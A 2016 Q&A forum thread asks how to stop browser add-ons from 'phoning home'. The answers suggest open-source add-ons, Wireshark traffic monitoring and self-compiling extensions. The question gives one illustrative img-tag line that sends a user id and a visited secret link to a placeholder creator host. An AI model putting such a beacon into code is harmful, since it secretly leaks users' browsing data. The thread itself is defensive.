Prevent browser addons from "phoning home"

0

In principle, any browser add-on can spy on me by collecting browser history, webmail or other sensitive data. AFAIKS, it could send this data back to its creator using either XMLHttpRequest() or fetch() or by manipulating the DOM, e.g. adding something like

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

triggering an HTTP request to the add-on creator's page with the possibility to send any data he likes. However, not all add-ons need to make HTTP requests or manipulate the DOM.

Hence the question:

Is there some existing solution for some browsers that restricts the JavaScript functionality accessible to an add-on - specifically to DOM manipulation and HTTP requests?

Thomas W.

Posted 2016-11-01T17:54:32.523

Reputation: 308

Answers

2

Im not sure, but it would depend on your browser. You could only use open source plugins, which would allow you to check if they phone home. Also, you could use something like Wireshark to look for any requests sent by the browser process to an IP other than the website you are visiting. Also, if you are using Firefox, there is lots of phoning home to Mozilla, unless you disable telemetry and I believe one other option in about:config. I forget the other option, but you could find it here. Im not sure about how to stop a plugin from phoning home, I guess you could try to custom build Firefox and somehow modify the way plugins are ran to keep them from sending web requests. This would make most plugins useless though, because they often have to send web requests to work.

To verify an open source addon has not been tampered with, you can compile it yourself. This tutorial shows you how to install jpm which can compile Firefox extensions. Once you install jpm, run:

jpm xpi

in the plugin source directory to generate an xpi extension file. Then open the xpi which should install it. It will likely tell you its untrusted, thats because it was compiled and not signed or on the Mozilla add-on website. This should work for most extensions, unless they are very old.

jellyfishcoder

Posted 2016-11-01T17:54:32.523

Reputation: 36

Good answer. The solution to me is use open source plugins only (and also open source browser) and make sure the binary has not been tampered with. – Marc.2377 – 2016-11-01T18:09:51.750

Originally I had another section in my question asking how to verify that an open source add-on was not tampered with - I think I'll add that back. – Thomas W. – 2016-11-01T18:42:43.677

Asked: 2016-11-01T17:54:32.523

Viewed: 333 times

Active: 2016-11-01T20:13:53.500